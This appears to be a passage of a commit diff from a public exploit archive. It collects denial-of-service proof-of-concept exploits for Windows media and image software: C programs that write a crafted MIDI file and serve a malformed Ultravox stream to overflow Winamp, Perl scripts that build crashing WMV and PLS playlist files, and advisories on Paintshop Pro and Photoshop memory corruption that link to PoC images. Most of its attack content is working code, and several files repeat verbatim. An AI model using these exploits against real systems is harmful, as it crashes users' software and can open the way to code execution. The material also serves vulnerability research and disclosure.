printf("\n* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *");
printf("\n* ********************************************** *");
printf("\n* PoC coded by: BassReFLeX *");
printf("\n* Date: 19 Jun 2006 *");
printf("\n* ********************************************** *");
if ( argc!=2 )
{
usage(argv[0]);
}
FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("\nFile couldn't open!");
exit(1);
}
printf("\n\nWriting crafted .mid file...");
fwrite(header,1,sizeof(header),f);
fwrite(badc0de,1,sizeof(badc0de),f);
printf("\nFile created successfully!");
printf("\nFile: %s",argv[1]);
return 0;
}
void usage(char* file)
{
printf("\n\n");
printf("\n%s <Filename>",file);
printf("\n\nFilename = .mid crafted file. Example: winsploit.exe craftedsh1t.mid");
exit(1);
}
// milw0rm.com [2006-06-20]
/*
* ********************************************** *
* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *
* ********************************************** *
* PoC coded by: BassReFLeX *
* Date: 19 Jun 2006 *
* ********************************************** *
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void usage(char* file);
char header[] = "\x4D\x54\x68\x64\x00\x00"
"\x00\x06\x00\x00\x00\x01"
"\x00\x60\x4D\x54\x72\x6B"
"\x00\x00";
char badc0de[] = "\xFF\xFF\xFF\xFF\xFF\xFF"
"\xFF\xFF\xFF\xFF\xFF\xFF";
int main(int argc,char* argv[])
{
system("cls");
printf("\n* ********************************************** *");
printf("\n* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *");
printf("\n* ********************************************** *");
printf("\n* PoC coded by: BassReFLeX *");
printf("\n* Date: 19 Jun 2006 *");
printf("\n* ********************************************** *");
if ( argc!=2 )
{
usage(argv[0]);
}
FILE *f;
f = fopen(argv[1],"w");
if ( !f )
{
printf("\nFile couldn't open!");
exit(1);
}
printf("\n\nWriting crafted .mid file...");
fwrite(header,1,sizeof(header),f);
fwrite(badc0de,1,sizeof(badc0de),f);
printf("\nFile created successfully!");
printf("\nFile: %s",argv[1]);
return 0;
}
void usage(char* file)
{
printf("\n\n");
printf("\n%s <Filename>",file);
printf("\n\nFilename = .mid crafted file. Example: winsploit.exe craftedsh1t.mid");
exit(1);
}
// milw0rm.com [2006-06-20]

434
platforms/windows/dos/2708.c
View file

@ -1,217 +1,217 @@
/************************************************************************************
Nullsoft Winamp < 5.31 Ultravox "Ultravox-Max-Msg" Heap Overflow Dos POC
by cocoruder(frankruder_at_hotmail.com),2006/10/30
use like "winamp_unsv.exe ultravox-max-msg_value",then the winamp_unsv(simple ultravox
server) will listen on tcp port 80,when winamp connect the server via ultravox protocol
usage example:
winamp_unsv.exe 500000000
winamp_unsv.exe 2147481601
**************************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock.h>
#define SERVER_PORT 80
unsigned char buff1_header1[]=
"HTTP/1.0 200 OK\x0D\x0A"
"Server: Ultravox 3.0\x0D\x0A"
"Content-Type: misc/ultravox\x0D\x0A"
"Ultravox-SID: 13381\x0D\x0A"
"Ultravox-Avg-Bitrate: 16000\x0D\x0A"
"Ultravox-Max-Bitrate: 24000\x0D\x0A"
"Ultravox-Max-Msg: ";
unsigned char buff1_header2[]=
"\x0D\x0A"
"Ultravox-Stream-Info: Ultravox;Live Stream\x0D\x0A"
"Ultravox-Msg-Que: 42\x0D\x0A"
"Ultravox-Max-Fragments: 1\x0D\x0A\x0D\x0A";
//4294965247
//1073739776
//1073739775
//1000000000
// 500000000
// 50000000
unsigned char buff2[]=
"\x5a\x00"
"\x39\x01\x01\xe0\x00\x01\x00\x01\x00\x01\x3c\x6d\x65\x74\x61\x64"
"\x61\x74\x61\x3e\x3c\x6c\x65\x6e\x67\x74\x68\x3e\x30\x3c\x2f\x6c"
"\x65\x6e\x67\x74\x68\x3e\x3c\x73\x6f\x6f\x6e\x3e\x4d\x6f\x72\x65"
"\x20\x6f\x6e\x20\x54\x48\x45\x20\x35\x30\x73\x3c\x2f\x73\x6f\x6f"
"\x6e\x3e\x3c\x73\x6f\x6e\x67\x3e\x3c\x6e\x61\x6d\x65\x3e\x54\x69"
"\x6e\x61\x20\x4d\x61\x72\x69\x65\x20\x28\x31\x39\x35\x35\x29\x3c"
"\x2f\x6e\x61\x6d\x65\x3e\x3c\x61\x6c\x62\x75\x6d\x3e\x47\x72\x65"
"\x61\x74\x65\x73\x74\x20\x48\x69\x74\x73\x3c\x2f\x61\x6c\x62\x75"
"\x6d\x3e\x3c\x61\x72\x74\x69\x73\x74\x3e\x50\x65\x72\x72\x79\x20"
"\x43\x6f\x6d\x6f\x20\x6f\x26\x23\x34\x37\x3b\x4d\x69\x74\x63\x68"
"\x65\x6c\x6c\x20\x41\x79\x72\x65\x73\x3c\x2f\x61\x72\x74\x69\x73"
"\x74\x3e\x3c\x61\x6c\x62\x75\x6d\x5f\x61\x72\x74\x3e\x78\x6d\x2f"
"\x73\x74\x61\x74\x69\x6f\x6e\x5f\x6c\x6f\x67\x6f\x5f\x35\x2e\x6a"
"\x70\x67\x3c\x2f\x61\x6c\x62\x75\x6d\x5f\x61\x72\x74\x3e\x3c\x73"
"\x65\x72\x69\x61\x6c\x3e\x2d\x31\x3c\x2f\x73\x65\x72\x69\x61\x6c"
"\x3e\x3c\x73\x6f\x6e\x67\x5f\x69\x64\x3e\x2d\x31\x3c\x2f\x73\x6f"
"\x6e\x67\x5f\x69\x64\x3e\x3c\x61\x6d\x67\x5f\x73\x6f\x6e\x67\x5f"
"\x69\x64\x3e\x2d\x31\x3c\x2f\x61\x6d\x67\x5f\x73\x6f\x6e\x67\x5f"
"\x69\x64\x3e\x3c\x61\x6d\x67\x5f\x61\x72\x74\x69\x73\x74\x5f\x69"
"\x64\x3e\x2d\x31\x3c\x2f\x61\x6d\x67\x5f\x61\x72\x74\x69\x73\x74"
"\x5f\x69\x64\x3e\x3c\x61\x6d\x67\x5f\x61\x6c\x62\x75\x6d\x5f\x69"
"\x64\x3e\x2d\x31\x3c\x2f\x61\x6d\x67\x5f\x61\x6c\x62\x75\x6d\x5f"
"\x69\x64\x3e\x3c\x69\x74\x75\x6e\x65\x73\x5f\x73\x6f\x6e\x67\x5f"
"\x69\x64\x3e\x2d\x31\x3c\x2f\x69\x74\x75\x6e\x65\x73\x5f\x73\x6f"
"\x6e\x67\x5f\x69\x64\x3e\x3c\x69\x74\x75\x6e\x65\x73\x5f\x61\x72"
"\x74\x69\x73\x74\x5f\x69\x64\x3e\x2d\x31\x3c\x2f\x69\x74\x75\x6e"
"\x65\x73\x5f\x61\x72\x74\x69\x73\x74\x5f\x69\x64\x3e\x3c\x69\x74"
"\x75\x6e\x65\x73\x5f\x61\x6c\x62\x75\x6d\x5f\x69\x64\x3e\x2d\x31"
"\x3c\x2f\x69\x74\x75\x6e\x65\x73\x5f\x61\x6c\x62\x75\x6d\x5f\x69"
"\x64\x3e\x3c\x2f\x73\x6f\x6e\x67\x3e\x3c\x2f\x6d\x65\x74\x61\x64"
"\x61\x74\x61\x3e\x00\x5a\x00\x80\x03\x03\x67\xff\xf9\x5c\x40\x0b"
"\xc1\x5c\x01\x62\x31\xa5\xe3\x40\x0e\x92\xda\x57\x42\x9c\xfa\x68"
"\xd3\xb3\xdb\x4b\x69\x89\x04\x00\x00\x2b\x8c\xbb\x5f\x92\xf3\x34"
"\x5a\x91\x5b\x43\xb0\xe1\x9b\x2f\x26\x66\x32\x67\x45\x59\x1e\x3c"
"\x68\x87\xfd\x97\x96\xa5\x75\x18\x0a\x27\x04\x0f\x09\xeb\x20\xb4"
"\x92\x0e\x18\xc5\xbc\xc8\xf8\xa6\x51\x12\x29\xe0\xf9\x81\x1b\xa6";
int main (int argc, char *argv[])
{
int i, num=1, rc, on = 1;
int listen_sd, accept_sd;
char buffer[80];
struct sockaddr_in addr;
WSADATA wsadata;
unsigned char *lpbuff;
DWORD bufflen;
int aa=-0x1000;
WSAStartup(MAKEWORD(2,2),&wsadata);
listen_sd = socket(AF_INET, SOCK_STREAM, 0);
if (listen_sd < 0)
{
perror("socket() failed");
exit(-1);
}
rc = setsockopt(listen_sd,
SOL_SOCKET, SO_REUSEADDR,
(char *)&on, sizeof(on));
if (rc < 0)
{
perror("setsockopt() failed");
closesocket(listen_sd);
exit(-1);
}
//Bind the socket
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_ANY);
addr.sin_port = htons(SERVER_PORT);
rc = bind(listen_sd,
(struct sockaddr *)&addr, sizeof(addr));
if (rc < 0)
{
perror("bind() failed");
closesocket(listen_sd);
exit(-1);
}
rc = listen(listen_sd, 5);
if (rc < 0)
{
perror("listen() failed");
closesocket(listen_sd);
exit(-1);
}
printf("The server is ready\n");
bufflen=sizeof(buff1_header1)-1+strlen(argv[1])+sizeof(buff1_header2)-1;
lpbuff=(unsigned char *)malloc(bufflen);
if (lpbuff==NULL)
{
printf("malloc error!\n");
return -1;
}
memset(lpbuff,0,bufflen);
strcat((char *)lpbuff,(char *)buff1_header1);
strcat((char *)lpbuff,(char *)argv[1]);
strcat((char *)lpbuff,(char *)buff1_header2);
for (i=0; i < num; i++)
{
printf("Interation: %d\n", i+1);
printf(" waiting on accept()\n");
accept_sd = accept(listen_sd, NULL, NULL);
if (accept_sd < 0)
{
perror("accept() failed");
closesocket(listen_sd);
exit(-1);
}
printf(" accept completed successfully\n");
printf(" wait for client to send us a message\n");
rc = recv(accept_sd, buffer, sizeof(buffer), 0);
if (rc <= 0)
{
perror("recv() failed");
closesocket(listen_sd);
closesocket(accept_sd);
exit(-1);
}
printf(" <%s>\n", buffer);
rc= send(accept_sd,(char *)lpbuff,bufflen,0);
if (rc>0)
{
printf("send ultravox header OK!\n");
}
rc=send(accept_sd,(char *)buff2,sizeof(buff2)-1,0);
if (rc>0)
{
printf("send ultravox first stream OK!\n");
}
while (1)
{
Sleep(1000);
}
}
closesocket(listen_sd);
return 0;
}
// milw0rm.com [2006-11-03]
/************************************************************************************
Nullsoft Winamp < 5.31 Ultravox "Ultravox-Max-Msg" Heap Overflow Dos POC
by cocoruder(frankruder_at_hotmail.com),2006/10/30
use like "winamp_unsv.exe ultravox-max-msg_value",then the winamp_unsv(simple ultravox
server) will listen on tcp port 80,when winamp connect the server via ultravox protocol
usage example:
winamp_unsv.exe 500000000
winamp_unsv.exe 2147481601
**************************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsock.h>
#define SERVER_PORT 80
unsigned char buff1_header1[]=
"HTTP/1.0 200 OK\x0D\x0A"
"Server: Ultravox 3.0\x0D\x0A"
"Content-Type: misc/ultravox\x0D\x0A"
"Ultravox-SID: 13381\x0D\x0A"
"Ultravox-Avg-Bitrate: 16000\x0D\x0A"
"Ultravox-Max-Bitrate: 24000\x0D\x0A"
"Ultravox-Max-Msg: ";
unsigned char buff1_header2[]=
"\x0D\x0A"
"Ultravox-Stream-Info: Ultravox;Live Stream\x0D\x0A"
"Ultravox-Msg-Que: 42\x0D\x0A"
"Ultravox-Max-Fragments: 1\x0D\x0A\x0D\x0A";
//4294965247
//1073739776
//1073739775
//1000000000
// 500000000
// 50000000
unsigned char buff2[]=
"\x5a\x00"
"\x39\x01\x01\xe0\x00\x01\x00\x01\x00\x01\x3c\x6d\x65\x74\x61\x64"
"\x61\x74\x61\x3e\x3c\x6c\x65\x6e\x67\x74\x68\x3e\x30\x3c\x2f\x6c"
"\x65\x6e\x67\x74\x68\x3e\x3c\x73\x6f\x6f\x6e\x3e\x4d\x6f\x72\x65"
"\x20\x6f\x6e\x20\x54\x48\x45\x20\x35\x30\x73\x3c\x2f\x73\x6f\x6f"
"\x6e\x3e\x3c\x73\x6f\x6e\x67\x3e\x3c\x6e\x61\x6d\x65\x3e\x54\x69"
"\x6e\x61\x20\x4d\x61\x72\x69\x65\x20\x28\x31\x39\x35\x35\x29\x3c"
"\x2f\x6e\x61\x6d\x65\x3e\x3c\x61\x6c\x62\x75\x6d\x3e\x47\x72\x65"
"\x61\x74\x65\x73\x74\x20\x48\x69\x74\x73\x3c\x2f\x61\x6c\x62\x75"
"\x6d\x3e\x3c\x61\x72\x74\x69\x73\x74\x3e\x50\x65\x72\x72\x79\x20"
"\x43\x6f\x6d\x6f\x20\x6f\x26\x23\x34\x37\x3b\x4d\x69\x74\x63\x68"
"\x65\x6c\x6c\x20\x41\x79\x72\x65\x73\x3c\x2f\x61\x72\x74\x69\x73"
"\x74\x3e\x3c\x61\x6c\x62\x75\x6d\x5f\x61\x72\x74\x3e\x78\x6d\x2f"
"\x73\x74\x61\x74\x69\x6f\x6e\x5f\x6c\x6f\x67\x6f\x5f\x35\x2e\x6a"
"\x70\x67\x3c\x2f\x61\x6c\x62\x75\x6d\x5f\x61\x72\x74\x3e\x3c\x73"
"\x65\x72\x69\x61\x6c\x3e\x2d\x31\x3c\x2f\x73\x65\x72\x69\x61\x6c"
"\x3e\x3c\x73\x6f\x6e\x67\x5f\x69\x64\x3e\x2d\x31\x3c\x2f\x73\x6f"
"\x6e\x67\x5f\x69\x64\x3e\x3c\x61\x6d\x67\x5f\x73\x6f\x6e\x67\x5f"
"\x69\x64\x3e\x2d\x31\x3c\x2f\x61\x6d\x67\x5f\x73\x6f\x6e\x67\x5f"
"\x69\x64\x3e\x3c\x61\x6d\x67\x5f\x61\x72\x74\x69\x73\x74\x5f\x69"
"\x64\x3e\x2d\x31\x3c\x2f\x61\x6d\x67\x5f\x61\x72\x74\x69\x73\x74"
"\x5f\x69\x64\x3e\x3c\x61\x6d\x67\x5f\x61\x6c\x62\x75\x6d\x5f\x69"
"\x64\x3e\x2d\x31\x3c\x2f\x61\x6d\x67\x5f\x61\x6c\x62\x75\x6d\x5f"
"\x69\x64\x3e\x3c\x69\x74\x75\x6e\x65\x73\x5f\x73\x6f\x6e\x67\x5f"
"\x69\x64\x3e\x2d\x31\x3c\x2f\x69\x74\x75\x6e\x65\x73\x5f\x73\x6f"
"\x6e\x67\x5f\x69\x64\x3e\x3c\x69\x74\x75\x6e\x65\x73\x5f\x61\x72"
"\x74\x69\x73\x74\x5f\x69\x64\x3e\x2d\x31\x3c\x2f\x69\x74\x75\x6e"
"\x65\x73\x5f\x61\x72\x74\x69\x73\x74\x5f\x69\x64\x3e\x3c\x69\x74"
"\x75\x6e\x65\x73\x5f\x61\x6c\x62\x75\x6d\x5f\x69\x64\x3e\x2d\x31"
"\x3c\x2f\x69\x74\x75\x6e\x65\x73\x5f\x61\x6c\x62\x75\x6d\x5f\x69"
"\x64\x3e\x3c\x2f\x73\x6f\x6e\x67\x3e\x3c\x2f\x6d\x65\x74\x61\x64"
"\x61\x74\x61\x3e\x00\x5a\x00\x80\x03\x03\x67\xff\xf9\x5c\x40\x0b"
"\xc1\x5c\x01\x62\x31\xa5\xe3\x40\x0e\x92\xda\x57\x42\x9c\xfa\x68"
"\xd3\xb3\xdb\x4b\x69\x89\x04\x00\x00\x2b\x8c\xbb\x5f\x92\xf3\x34"
"\x5a\x91\x5b\x43\xb0\xe1\x9b\x2f\x26\x66\x32\x67\x45\x59\x1e\x3c"
"\x68\x87\xfd\x97\x96\xa5\x75\x18\x0a\x27\x04\x0f\x09\xeb\x20\xb4"
"\x92\x0e\x18\xc5\xbc\xc8\xf8\xa6\x51\x12\x29\xe0\xf9\x81\x1b\xa6";
int main (int argc, char *argv[])
{
int i, num=1, rc, on = 1;
int listen_sd, accept_sd;
char buffer[80];
struct sockaddr_in addr;
WSADATA wsadata;
unsigned char *lpbuff;
DWORD bufflen;
int aa=-0x1000;
WSAStartup(MAKEWORD(2,2),&wsadata);
listen_sd = socket(AF_INET, SOCK_STREAM, 0);
if (listen_sd < 0)
{
perror("socket() failed");
exit(-1);
}
rc = setsockopt(listen_sd,
SOL_SOCKET, SO_REUSEADDR,
(char *)&on, sizeof(on));
if (rc < 0)
{
perror("setsockopt() failed");
closesocket(listen_sd);
exit(-1);
}
//Bind the socket
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = htonl(INADDR_ANY);
addr.sin_port = htons(SERVER_PORT);
rc = bind(listen_sd,
(struct sockaddr *)&addr, sizeof(addr));
if (rc < 0)
{
perror("bind() failed");
closesocket(listen_sd);
exit(-1);
}
rc = listen(listen_sd, 5);
if (rc < 0)
{
perror("listen() failed");
closesocket(listen_sd);
exit(-1);
}
printf("The server is ready\n");
bufflen=sizeof(buff1_header1)-1+strlen(argv[1])+sizeof(buff1_header2)-1;
lpbuff=(unsigned char *)malloc(bufflen);
if (lpbuff==NULL)
{
printf("malloc error!\n");
return -1;
}
memset(lpbuff,0,bufflen);
strcat((char *)lpbuff,(char *)buff1_header1);
strcat((char *)lpbuff,(char *)argv[1]);
strcat((char *)lpbuff,(char *)buff1_header2);
for (i=0; i < num; i++)
{
printf("Interation: %d\n", i+1);
printf(" waiting on accept()\n");
accept_sd = accept(listen_sd, NULL, NULL);
if (accept_sd < 0)
{
perror("accept() failed");
closesocket(listen_sd);
exit(-1);
}
printf(" accept completed successfully\n");
printf(" wait for client to send us a message\n");
rc = recv(accept_sd, buffer, sizeof(buffer), 0);
if (rc <= 0)
{
perror("recv() failed");
closesocket(listen_sd);
closesocket(accept_sd);
exit(-1);
}
printf(" <%s>\n", buffer);
rc= send(accept_sd,(char *)lpbuff,bufflen,0);
if (rc>0)
{
printf("send ultravox header OK!\n");
}
rc=send(accept_sd,(char *)buff2,sizeof(buff2)-1,0);
if (rc>0)
{
printf("send ultravox first stream OK!\n");
}
while (1)
{
Sleep(1000);
}
}
closesocket(listen_sd);
return 0;
}
// milw0rm.com [2006-11-03]

74
platforms/windows/dos/37346.txt Executable file
View file

@ -0,0 +1,74 @@
#####################################################################################
Application: Paintshop Pro X7 GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)
Platforms: Windows
Versions: The vulnerability is confirmed in version Paintshop Prox X7, Other versions may also be affected.
Secunia:
{PRL}: 2015-06
Author: Francis Provencher (Protek Research Labs)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
PaintShop Pro (PSP) is a raster and vector graphics editor for Microsoft Windows. It was originally published by Jasc Software. In October 2004, Corel purchased Jasc Software and the distribution rights to Paint Shop Pro. PSP functionality can be extended by Photoshop-compatible plugins.
Although often written as Paint Shop Pro, Corels website shows the name for the product as PaintShop Pro. The X-numbered editions have been sold in two versions: PaintShop Pro, which is the basic editing program, and PaintShop Pro Ultimate, which bundles in other standalone programs. The particular bundled programs have varied with each numbered version and have not been sold by Corel as separate products.
(https://en.wikipedia.org/wiki/PaintShop_Pro)
#####################################################################################
============================
2) Report Timeline
============================
2015-04-23: Francis Provencher from Protek Research Labs found the issue;
2015-02-24: Francis Provencher From Protek Research Labs ask for a security contact at Corel Software;
2015-02-25: Francis Provencher From Protek Research Labs ask for a security contact at Corel Software;
2015-05-10: Corel push a silent fix, without credit.
2015-05-16: Publication of this advisory.
#####################################################################################
============================
3) Technical details
============================
An error when handling LZWMinimumCodeSize can be exploited to cause an heap memory corruption via a specially crafted GIF file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/PRL-2015-06.gif
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37346.gif
###############################################################################

74
platforms/windows/dos/37347.txt Executable file
View file

@ -0,0 +1,74 @@
#####################################################################################
Application: Adobe Photoshop CC 2014 & Bridge CC 2014
Platforms: Windows
Versions: The vulnerability is confirmed in version Photoshop CC 2014 and Bridge CC 2014.
Secunia:
{PRL}: 2015-07
Author: Francis Provencher (Protek Research Labs)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Photoshop is a raster graphics editor developed and published by Adobe Systems for Windows and OS X.
Photoshop was created in 1988 by Thomas and John Knoll. Since then, it has become the de facto industry standard in raster graphics editing, such that the word “photoshop” has become a verb as in “to photoshop an image,” “photoshopping,” and “photoshop contest,” etc. It can edit and compose raster images in multiple layers and supports masks, alpha compositing and several colour models including RGB,CMYK, Lab colour space (with capital L), spot colour and duotone. Photoshop has vast support for graphic file formats but also uses its own PSD and PSB file formats which support all the aforementioned features. In addition to raster graphics, it has limited abilities to edit or render text, vector graphics (especially through clipping path), 3D graphics and video. Photoshops featureset can be expanded by Photoshop plug-ins, programs developed and distributed independently of Photoshop that can run inside it and offer new or enhanced features.
(https://en.wikipedia.org/wiki/Adobe_Photoshop)
#####################################################################################
============================
2) Report Timeline
============================
2015-03-15: Francis Provencher from Protek Research Labs found the issue;
2015-03-19: Francis Provencher From Protek Research Labs report vulnerability to PSIRT;
2015-05-16: Adobe release a patch (APSB15-12)
#####################################################################################
============================
3) Technical details
============================
An error in the the GIF parser, could lead to a memory corruption when processing a crafted GIF image with an invalid value in the “ImageLeftPosition” into
the “ImageDescriptor”.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires
tricking a user into opening or previewing a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/PRL-2015-07.gif
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37347.gif
###############################################################################

71
platforms/windows/dos/37348.txt Executable file
View file

@ -0,0 +1,71 @@
#####################################################################################
Application: Adobe Photoshop CC 2014 & Bridge CC 2014
Platforms: Windows
Versions: The vulnerability is confirmed in version Photoshop CC 2014 and Bridge CC 2014.
Secunia:
{PRL}: 2015-08
Author: Francis Provencher (Protek Research Labs)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Photoshop is a raster graphics editor developed and published by Adobe Systems for Windows and OS X.
Photoshop was created in 1988 by Thomas and John Knoll. Since then, it has become the de facto industry standard in raster graphics editing, such that the word “photoshop” has become a verb as in “to photoshop an image,” “photoshopping,” and “photoshop contest,” etc. It can edit and compose raster images in multiple layers and supports masks, alpha compositing and several colour models including RGB,CMYK, Lab colour space (with capital L), spot colour and duotone. Photoshop has vast support for graphic file formats but also uses its own PSD and PSB file formats which support all the aforementioned features. In addition to raster graphics, it has limited abilities to edit or render text, vector graphics (especially through clipping path), 3D graphics and video. Photoshops featureset can be expanded by Photoshop plug-ins, programs developed and distributed independently of Photoshop that can run inside it and offer new or enhanced features.
(https://en.wikipedia.org/wiki/Adobe_Photoshop)
#####################################################################################
============================
2) Report Timeline
============================
2015-03-15: Francis Provencher from Protek Research Labs found the issue;
2015-03-19: Francis Provencher From Protek Research Labs report vulnerability to PSIRT;
2015-05-16: Adobe release a patch (APSB15-12)
#####################################################################################
============================
3) Technical details
============================
An error in the the PNG parser, could lead to a memory corruption when processing a crafted PNG image with an oversize value in the “Length” into the “CHUNK” Structure.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires
tricking a user into opening or previewing a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/PRL-2015-08.png
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37348.png
###############################################################################

71
platforms/windows/dos/37349.txt Executable file
View file

@ -0,0 +1,71 @@
#####################################################################################
Application: Adobe Photoshop CC 2014 & Bridge CC 2014
Platforms: Windows
Versions: The vulnerability is confirmed in version Photoshop CC 2014 and Bridge CC 2014.
Secunia:
{PRL}: 2015-08
Author: Francis Provencher (Protek Research Labs)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Photoshop is a raster graphics editor developed and published by Adobe Systems for Windows and OS X.
Photoshop was created in 1988 by Thomas and John Knoll. Since then, it has become the de facto industry standard in raster graphics editing, such that the word “photoshop” has become a verb as in “to photoshop an image,” “photoshopping,” and “photoshop contest,” etc. It can edit and compose raster images in multiple layers and supports masks, alpha compositing and several colour models including RGB,CMYK, Lab colour space (with capital L), spot colour and duotone. Photoshop has vast support for graphic file formats but also uses its own PSD and PSB file formats which support all the aforementioned features. In addition to raster graphics, it has limited abilities to edit or render text, vector graphics (especially through clipping path), 3D graphics and video. Photoshops featureset can be expanded by Photoshop plug-ins, programs developed and distributed independently of Photoshop that can run inside it and offer new or enhanced features.
(https://en.wikipedia.org/wiki/Adobe_Photoshop)
#####################################################################################
============================
2) Report Timeline
============================
2015-03-15: Francis Provencher from Protek Research Labs found the issue;
2015-03-19: Francis Provencher From Protek Research Labs report vulnerability to PSIRT;
2015-05-16: Adobe release a patch (APSB15-12)
#####################################################################################
============================
3) Technical details
============================
An error in the the PNG parser, could lead to a memory corruption when processing a crafted PNG image with an oversize value in the “Length” into the “CHUNK” Structure.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires
tricking a user into opening or previewing a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/PRL-2015-08.png
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37349.png
###############################################################################

130
platforms/windows/dos/3768.pl
View file

@ -1,65 +1,65 @@
#!/usr/bin/perl
# --------------------------------- Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY) ---------------------------------
# Type :
# Buffer Overflow - DOS
# Release Date :
# {2007-04-16}
# Product / Vendor :
# Winamp Media Player
# http://www.winamp.com/
# Exploit :
#############################################
#Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]#
#############################################
{
print "\n-----------------------------------\n";
print "Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY)\n";
print "-----------------------------------\n";
print "\nUniquE-Key{UniquE-Cracker}\n";
print "UniquE[at]UniquE-Key.ORG\n";
print "http://UniquE-Key.ORG\n";
print "\n-----------------------------------\n";
print "\nExploit Completed!\n";
print "\n-----------------------------------\n";
}
open(wmv, ">./exploit.wmv");
print wmv "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00".
print wmv "\x4D\x54\x68\x64";
close(wmv);
# Tested :
# --- WINAMP 5.3 Version ---
# Author :
# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org
# milw0rm.com [2007-04-19]
#!/usr/bin/perl
# --------------------------------- Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY) ---------------------------------
# Type :
# Buffer Overflow - DOS
# Release Date :
# {2007-04-16}
# Product / Vendor :
# Winamp Media Player
# http://www.winamp.com/
# Exploit :
#############################################
#Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]#
#############################################
{
print "\n-----------------------------------\n";
print "Winamp <= (WMV) 5.3 Buffer Overflow DOS Exploit (0-DAY)\n";
print "-----------------------------------\n";
print "\nUniquE-Key{UniquE-Cracker}\n";
print "UniquE[at]UniquE-Key.ORG\n";
print "http://UniquE-Key.ORG\n";
print "\n-----------------------------------\n";
print "\nExploit Completed!\n";
print "\n-----------------------------------\n";
}
open(wmv, ">./exploit.wmv");
print wmv "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00".
print wmv "\x4D\x54\x68\x64";
close(wmv);
# Tested :
# --- WINAMP 5.3 Version ---
# Author :
# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org
# milw0rm.com [2007-04-19]

112
platforms/windows/dos/7696.pl
View file

@ -1,56 +1,56 @@
#!/usr/bin/perl
# WinAmp GEN_MSN Plugin Heap Buffer Overflow
# ------------------------------------
# Discovered by SkD (skdrat@hotmail.com) &
# (skd@abysssec.com)
# ------------------------------------
#
# I'm not much for posting PoCs because
# I like writing exploits for whatever
# I discover and if I don't, its a waste.
#
# Anyway, this buffer overflow is located
# in the gen_msn plugin, which
# is basically a plugin that shows what
# song you're currently listening to
# on your PM in MSN. The plugin has over
# 800,000 downloads so its serious..
# (http://www.winamp.com/plugins/details/144799)
# This is similar to my other recent exploit
# for VUPlayer because it uses the same point
# of the .PLS playlist file!
#
# Debug Info:
# MOV EDI,DWORD PTR DS:[ECX+EAX*4+960]
# Regs:
# EAX 00000003
# ECX 41414141 <- Clear control over the register
# EDX 007EA478
# EBX 40000001
# ESP 028F1DB0
# EBP 77230459 USER32.SendMessageA
# ESI 08FD62A8 gen_msn.08FD62A8
# EDI 00497300 UNICODE "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
# EIP 08FD293C gen_msn.08FD293C
#
# Peace out.
# _________ ___ ________
# / _____/| | __\______ \
# \_____ \ | |/ / | | \
# / \| < | ` \
# /_______ /|__|_ \/_______ /
# \/ \/ \/
use strict;
use warnings;
my $overflow = "\x41" x 2048;
open(my $pls_playlist, "> poc.pls");
print $pls_playlist "[playlist]\r\n".
"NumberOfEntries=1\r\n".
"File1=http://".
$overflow.
"\r\n";
close $pls_playlist;
# milw0rm.com [2009-01-07]
#!/usr/bin/perl
# WinAmp GEN_MSN Plugin Heap Buffer Overflow
# ------------------------------------
# Discovered by SkD (skdrat@hotmail.com) &
# (skd@abysssec.com)
# ------------------------------------
#
# I'm not much for posting PoCs because
# I like writing exploits for whatever
# I discover and if I don't, its a waste.
#
# Anyway, this buffer overflow is located
# in the gen_msn plugin, which
# is basically a plugin that shows what
# song you're currently listening to
# on your PM in MSN. The plugin has over
# 800,000 downloads so its serious..
# (http://www.winamp.com/plugins/details/144799)
# This is similar to my other recent exploit
# for VUPlayer because it uses the same point
# of the .PLS playlist file!
#
# Debug Info:
# MOV EDI,DWORD PTR DS:[ECX+EAX*4+960]
# Regs:
# EAX 00000003
